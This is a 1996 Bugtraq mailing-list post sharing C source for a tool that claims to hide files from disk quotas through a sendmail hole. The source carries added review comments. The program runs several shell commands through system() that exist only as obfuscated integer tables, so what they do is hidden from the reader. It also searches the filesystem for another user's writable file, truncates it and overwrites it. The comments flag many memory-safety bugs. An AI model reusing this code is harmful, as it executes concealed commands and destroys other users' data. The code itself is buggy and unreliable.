Bugtraq mailing list archives

quotas? maybe you're not seeing all of it


From: blh () nol net (Brett L. Hawn)
Date: Sun, 21 Jul 1996 10:57:28 -0500


I finally found the source to this annoying little monster so I thought I'd
let y'all see it. I don't know offhand if this little bug has been seen
or discussed before, but if it hasn't I'm quite sure all of you would
love to fix it :) I've not tried it on anything but Solaris 2.5 so far but
I've no doubt that it'll work elsewhere as well.

What this does is take a file and hide it in someone else's directories
using sendmail.

/**************************************************************************
 * This exploit takes advantage of the latest sendmail hole, to hide      *
 * warez from your quota program, effectively making your quota infinite. *
 *                                                                        *
 * To compile:                                                            *
 *   cc -o bigquota quota.c                                               *
 * To run:                                                                *
 *   ./bigquota file                                                      *
 * where file is the file you wish to hide from your quota program.       *
 *                                                                        *
 * Please note that this may take a minute.                               *
 * If you have any problems, talk to me, TSK, on IRC.                     *
 **************************************************************************/

#include <unistd.h>
#include <sys/stat.h>
#include <dirent.h>
#include <stdio.h>
#include <fcntl.h>

/*
 * Shared additive key for the obfuscated tables in main().
 * zipper() and checkseed() add seedsc[i] to element i of a seed table and
 * store the sum as a character, so none of the strings later passed to
 * system() appear in this source in readable form.
 */
int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\
44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\
65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\
118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\
94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\
85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\
32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\
112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\
115,85,38,30,122,126,3,93,97,44,100,32,33,10};

/*
 * Entry point (K&R-style definition; argv[1] is the file named by the user).
 *
 * Visible behaviour, in order:
 *   1. Unless exactly one argument is given, print usage and exit(0).
 *   2. Pass the strings decoded from initseeds and setupseeds (zipper()) and
 *      the result of checkseed(binseeds) to system().
 *   3. checkdir("/") searches from the filesystem root for a regular file
 *      that the caller can write but does not own.
 *   4. That file is opened with O_WRONLY|O_TRUNC (its previous contents are
 *      discarded), argv[1] is copied into it, argv[1] is unlinked, and the
 *      name argv[1] is re-created by rename(), else link(), else symlink().
 *   5. The closeout label is reached on every path after the usage check and
 *      makes three more system() calls.
 *
 * NOTE(review): the banner comment describes a sendmail hole, but no visible
 * call in this file names or talks to sendmail. Apart from the file copy,
 * every external action goes through system() on strings that exist in the
 * source only as the integer tables below. What the program executes cannot
 * be read off the source; it has to be established by decoding the tables or
 * by observing the process in an isolated environment, so the banner's
 * description should be treated as unverified.
 */
void main(argc, argv)
int argc;
char *argv[];
{
char *checkseed(int *seeds);
char *checkdir(char *dir);
/* Obfuscated command tables: each is decoded by adding seedsc[] element-wise
   (see zipper()). The decoded text is not shown anywhere in this file. */
int initseeds[201]={25,\
108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\
116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\
2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\
98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\
95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\
41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\
109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\
126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\
53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\
3,-9,-23,11,-21,-90,-30,-7,20,-17,23};
int setupseeds[201]={1,\
35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\
110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\
29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\
38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\
28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\
119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\
93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\
-6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\
42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\
67,-10,-79,96,23,4,3,-68,84,64,89};
int binseeds[201]={1,\
14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\
121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\
64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\
89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\
121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\
12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\
42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\
-7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\
-23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\
89,-7,-11,94,19,-65,72,-3,67,79,111};
int procseeds[201]={-14,\
97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\
17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\
121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\
125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\
78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\
95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\
107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\
99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\
116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\
85,-11,-22,111,-47,-65,60,-1,85,78,106};
int boutseeds[201]={-14842,\
37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\
17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\
74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\
75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\
70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\
34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\
6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\
106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\
-55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\
32,-72,-94,40,-61,-54,-12,11,72,66,91};
int shtdwnseeds[201]={-42,\
58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\
122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\
69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\
115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\
125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\
1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\
32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\
108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\
12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\
16,-90,-78,45,-38,-65,56,11,77,71,89};
char *zipper(int *seeds1);
char *path;
/* i and j are declared but never used in this function. */
int i=0,j,inhan,outhan;
if(argc!=2)
        {
        puts("Usage:");
        puts("quota <file>");
        puts("where <file> is the file you wish");
        puts("to hide/subtract from your quota.");
        exit(0);
        }
/* Three decoded strings are executed as shell commands before the file named
   on the command line is even opened. checkseed() can return 0, in which
   case system() receives a null pointer. */
system(zipper(initseeds));
system(zipper(setupseeds));
system(checkseed(binseeds));
/* Search from "/" for another user's writable regular file (see checkdir). */
path=checkdir("/");
if(!path)
        {
        puts("Technical Dificulties");
        goto closeout;
        }
/* O_TRUNC empties the file checkdir() found as soon as the open succeeds. */
if((outhan=open(path,O_WRONLY|O_TRUNC))==-1)
        {
        puts("Error opening outfile");
        goto closeout;
        }
if((inhan=open(argv[1],O_RDONLY))==-1)
        {
        puts("Error opening infile");
        goto closeout;
        }
/* filecopy() is used without a prior declaration; neither descriptor is
   closed afterwards. */
if(filecopy(inhan,outhan))
        {
        puts("Technical dificulties");
        goto closeout;
        }
if((unlink(argv[1]))==-1)
        {
        puts("Technical dificulties.");
        goto closeout;
        }
/* Re-create the original name pointing at the other user's file: move it,
   else hard-link it, else symlink it. */
if((rename(path,argv[1]))==-1)
        if((link(path,argv[1]))==-1)
                if((symlink(path,argv[1]))==-1)
                        puts("Technical Dificulties.");
closeout:
/* NOTE(review): system() takes a single argument. As written the command
   string is the literal "%s\n" and the decoded table is an extra argument
   that system() does not read; the call is accepted only because no
   prototype for system() is in scope. Presumably a printf-style call was
   intended; confirm before drawing conclusions about what runs here. */
system("%s\n",zipper(procseeds));
system("%s\n",zipper(boutseeds));
system("%s\n",zipper(shtdwnseeds));
}

/*
 * Decode the leading word of an obfuscated table and look for it along PATH.
 *
 * seeds: a seed table of the same layout zipper() consumes.
 * Returns zipper(seeds) (a malloc'd decoded string) as soon as a stat() call
 * on a PATH entry succeeds, or 0 if none does. Exits with -1 when PATH is not
 * set in the environment.
 *
 * NOTE(review): several accesses below are out of bounds or unchecked; they
 * are annotated in place. The function's real behaviour depends on them, so
 * it should not be assumed to do what its structure suggests.
 */
char *checkseed(int *seeds)
{
char *zipper(int *seeds1);
char *string;
char testseeds[30];
char god[200];
int i=200,j;
if((string=(char *)getenv("PATH"))==NULL)
        {
        puts("Path not found");
        exit(-1);
        }
/* Walk the table from index 200 downwards, decoding characters until one
   decodes to 32 (a space). Neither the 30-byte size of testseeds nor i >= 0
   is checked. */
while((seeds[i]+seedsc[i])!=32)
        {
        testseeds[200-i]=seeds[i]+seedsc[i];
        i--;
        }
/* i is still the table index counting down from 200, not the write position
   200-i, so the terminator is stored at testseeds[i]; for any i >= 30 that
   lies outside the array and the decoded word itself is left unterminated. */
testseeds[i]=0;
i=0;
/* Split PATH on ':' (58). */
while(string[i]!=0)
        {
        j=0;
        /* Copy one PATH entry into god; its 200-byte size is not checked. */
        while(string[i]!=58&&string[i]!=0)
                {
                god[j]=string[i];
                i++;
                j++;
                }
        /* When the entry ended at the string's NUL, this steps past it and the
           outer loop condition then reads beyond the end of PATH. */
        i++;
        god[j++]=47;
        /* The NUL is written before the name is appended, so as a C string
           god is only "<entry>/"; the strcpy below lands after the
           terminator. */
        god[j++]=0;
        strcpy(&god[j],testseeds);
        /* stat() is handed a null buffer; whether it can return 0 like this is
           platform-dependent. TODO confirm on the target system. */
        if(!stat(god,NULL))
                return (char *)zipper(seeds);
        }
return 0;
}

/*
 * Decode one obfuscated table into a heap string.
 *
 * seeds1: table with indices 0..200 readable.
 * For every index i, seeds1[i] + seedsc[i] is stored (narrowed to char) at
 * position 200-i, so the decoded text is the element-wise sum in reverse
 * order. Returns a 201-byte malloc'd copy; no caller in this file frees it
 * and the malloc result is not checked.
 */
char *zipper(int *seeds1)
{
int i;
char *buhbye;
char teeth[201];
/* teeth has valid indices 0..200; this store is one element past the end. */
teeth[201]=0;
for(i=200;i>=0;i--)
        teeth[200-i]=seeds1[i]+seedsc[i];
buhbye=(char *)malloc(201);
/* All 201 bytes of teeth were just overwritten, so it holds a terminator
   only if one of the sums is 0 as a char; otherwise strcpy reads past teeth
   and writes past the 201-byte allocation. */
strcpy(buhbye,teeth);
return buhbye;
}

/*
 * Copy everything readable from descriptor `from` to descriptor `to`.
 *
 * Returns 0 once read() reports end of file, 1 on any failure: a negative
 * descriptor, no buffer could be allocated, read() returned -1, or write()
 * wrote a different number of bytes than were read (a short write is treated
 * as an error, not retried). Neither descriptor is closed here.
 */
int filecopy(int from,int to)
{
char *chunk = NULL;
int chunk_len = 0x4000;
int status = 1;

if (from < 0 || to < 0)
        return 1;

/* Start at 16 KiB and halve down to 128 bytes until an allocation works. */
while (chunk_len >= 128)
        {
        chunk = (char *) malloc(chunk_len);
        if (chunk != NULL)
                break;
        chunk_len >>= 1;
        }
if (chunk == NULL)
        return 1;

for (;;)
        {
        int got = read(from,chunk,chunk_len);
        if (got == 0)
                {
                /* End of input: the only successful exit. */
                status = 0;
                break;
                }
        if (got == -1)
                break;
        if (write(to,chunk,(unsigned) got) != got)
                break;
        }
free(chunk);
return status;
}

/*
 * Depth-first search below `dir` for a file belonging to someone else that
 * the caller may overwrite.
 *
 * dir: directory to scan ("/" is special-cased so no second slash is added).
 * Returns a malloc'd path to the first entry that passes the regular-file
 * tests below, or 0 when the directory cannot be opened, an lstat() fails, or
 * nothing qualifies.
 *
 * NOTE(review): a file this function returns is one that is writable by a
 * user who does not own it; main() truncates it. The 300-byte path buffer is
 * filled without any length check, and it is leaked on every path that
 * returns 0. The early returns inside the loop also skip closedir().
 */
char *checkdir(char *dir)
{
/* Redundant local prototype for the function being defined. */
char *checkdir(char *dir);
DIR *currdir;
struct dirent *node;
struct stat statnode;
int i,j;
char *path;
char *retpath;
path=(char *)malloc(300);
if((currdir=opendir(dir))==NULL)
        return 0;
node=readdir(currdir);
while(node)
        {
        /* Build "<dir>/<d_name>" by hand into path. */
        i=0;
        j=0;
        while(dir[i])
                {
                path[i]=dir[i];
                i++;
                }
        if(strcmp(dir,"/"))
                {
                path[i]='/';
                i++;
                }
        while(node->d_name[j])
                {
                path[i]=node->d_name[j];
                i++;
                j++;
                }
        path[i]=0;

        /* A single failing lstat() aborts the whole scan of this directory. */
        if((lstat(path,&statnode))==-1)
                return 0;
        /* The mode checks test individual S_IF* bits rather than comparing
           (st_mode & S_IFMT) with one type; the extra negative tests
           presumably compensate for types whose bit patterns overlap. Verify
           against the target's <sys/stat.h>. */
        /* Candidate: S_IFREG bit set, writable by the caller per access(), no
           S_IFBLK bits, no sticky bit, and not owned by the caller. */
        if(statnode.st_mode&S_IFREG)
                if(!access(path,W_OK))
                if(!(statnode.st_mode&S_IFBLK))
                if(!(statnode.st_mode&S_ISVTX))
                if(statnode.st_uid!=getuid())
                        return path;
        /* Recurse into directories other than "." and ".." that are not owned
           by the caller and do not carry the sticky bit. */
        if(statnode.st_mode&S_IFDIR)
                if(strcmp(node->d_name,".")&&strcmp(node->d_name,".."))
                if(!(statnode.st_mode&S_IFREG))
                if(!(statnode.st_mode&S_IFCHR))
                if(!(statnode.st_mode&S_ISVTX))
                if(statnode.st_uid!=getuid())
                {
                retpath=checkdir(path);
                if(retpath)
                        return retpath;
                }
        node=readdir(currdir);
        }
closedir(currdir);
return 0;
}



[-]                  Brett L. Hawn (blh () nol net)                           [-]
[-]                Networks On-Line - Houston, Texas                       [-]
[-]                           713-467-7100                                 [-]


